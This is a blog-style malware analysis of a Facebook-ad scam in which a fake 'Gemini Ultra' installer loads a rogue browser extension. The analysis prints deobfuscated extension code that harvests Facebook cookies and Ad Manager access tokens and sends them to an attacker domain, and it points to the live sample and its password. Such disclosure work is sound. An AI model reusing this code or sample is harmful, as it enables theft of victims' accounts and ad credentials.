Breakdown of The Ad Manager Scam: Hackers Stealing Facebook, Page and Ad Manager Information

I usually don’t write this type of blog, But one thing caught in my eye while my younger brother scrolling Facebook and I was sitting there enjoying memes. This Ad in Facebook pretty interesting and eye catching.

So, I told him to stop and handover his PC so I can start research about it that what’s going on here, after doing some google search I found that this Scam in very popular in Asia region including Bangladesh, and the campaign originates from the Philippines and Vietnam mostly.

Tools & Website I will use here:

• UniExtract2
• JavaScript Deobfuscator

Sample ( Download it on your own risk ):

• Ai.Gemini Ultra v1.01 ( Password: 2024 )

Information of the scammers:

• https://www.facebook.com/cyancaelprintingservices
• https://linkr.bio/UltravsGmn
• Running Ads

Research stage:

Downloaded the file extracted with the password

Setup file after extract from rar

Once this process done I used UniExtract2 to extract file content from the “setup.msi”.

Extracted files from setup.msi

So, when “setup.msi” open, first thing it execute “install.cmd” and the install.cmd is executing “ru.ps1” from “nmmhkkegccagdldgiimedpic” folder:

install.cmd file

ru.ps1 file

What this “ru.ps1” file doing is tries to close any open instances of Google Chrome, Microsoft Edge, and Brave browsers forcefully without showing any error messages. After waiting for 1 second, it sets the path to the Google Chrome executable file (where Chrome is installed) by checking the Windows registry. It then sets a variable called $et to the path of a Google Chrome extension. If the extension path doesn’t exist in the default location, it checks another location. It sets a variable called $urlToOpen to "https://bard.google.com/chat". It prepares a list of arguments to pass to the browser processes. These arguments include loading the Chrome extension, opening a new window, and navigating to the specified URL.

If Google Chrome is installed on the system (checked by the $chromePath variable), it starts a new instance of Chrome with the specified arguments. Similarly, it checks if Microsoft Edge and Brave browsers are installed on the system and starts new instances of them with the same arguments if they are installed.

So, Basically it installing a fake extension in the browser.

Fake extension

Inside the background.js initially they obfuscate the code https://pastebin.com/d4HiFp1e

obfuscate background.js

I used a website which help to deobfuscate the JavaScript code https://deobfuscate.io/ the deobfuscated code https://pastebin.com/Lkewvt8K

deobfuscator background.js

When the browser will start with the extension it will start stealing Facebook cookie.

const getsss = () => {
  return new Promise((resolve, reject) => {
    chrome.cookies.getAll({url: "https://facebook.com"}, data => {
      const coo = data.map(e => {
        return "" + e.name + "=" + e.value + "";
      }).join(";");
      resolve(coo);
    });
  });
};

From the Ad manager of Facebook another function GetToken() will gather “access_token”

function GetToken(cook) {
  return new Promise(resolve => {
    fetch("https://www.facebook.com/ads/manager/account_settings/information/", o).then(req => {
      return req.text();
    }).then(responseHTML => {
      let startS = 'access_token:"';
      let endS = '"';
      let regex = new RegExp("" + startS + "(.*?)" + endS + "");
      let match = responseHTML.match(regex);
      let token_bm = match ? match[1] : null;
      let startS2 = '"token":"';
      let endS2 = '"';
      let fb_dtsg = responseHTML.match(new RegExp("(?<=" + startS2 + "+).*?(?=" + endS2 + ")", "gs"))[0];
      resolve({token_bm, fb_dtsg});
    }).catch(error => {
      fetch("https://www.facebook.com/ads/manager/account_settings/information/", o).then(req => {
        return req.text();
      }).then(responseHTML => {
        let startS = 'access_token:"';
        let endS = '"';
        let regex = new RegExp("" + startS + "(.*?)" + endS + "");
        let match = responseHTML.match(regex);
        let token_bm = match ? match[1] : null;
        let startS2 = '"token":"';
        let endS2 = '"';
        let fb_dtsg = responseHTML.match(new RegExp("(?<=" + startS2 + "+).*?(?=" + endS2 + ")", "gs"))[0];
        resolve({token_bm, fb_dtsg});
      });
    });
  });
}

background.js 67 number lines code

So, now the getsss()function getting called, and checks if the coo doesn’t contain c_user it will stop there and no further task will be done here.

Above function will retrieve different value using the Facebook Graph API using the access_token earlier it collected from GetToken() function.

gathering information of user IP

Attacker also gathering user GEO Location and keeping inside msg variable, and Finally it sending data to a website called https://managedkv.com

sending the data over to the website

This is all going on behind the scam, I did whois search on the domain I found the the Registrar Name: NetEarth One Inc. d/b/a NetEarth

neteartone.com

The registrar NetEarth One Inc. d/b/a NetEarth also owned domain named https://netearthone.com

It’s hosting company

Inside the root folder I found some excel file of some users those file contains page name, page likes.

New Folder contains the list of files

list of pages information

MITRE ATT&CK framework might apply:

• T1059 — Command and Scripting Interpreter
• T1048 — Exfiltration Over Alternative Protocol

Conclusion:

Users should exercise caution while browsing the internet, especially when encountering unfamiliar files or websites. It is essential to have up-to-date antivirus software installed to detect and prevent potential threats. Additionally, users should avoid clicking on suspicious links or downloading files from untrusted sources to mitigate the risk of falling victim to scams or malware attacks.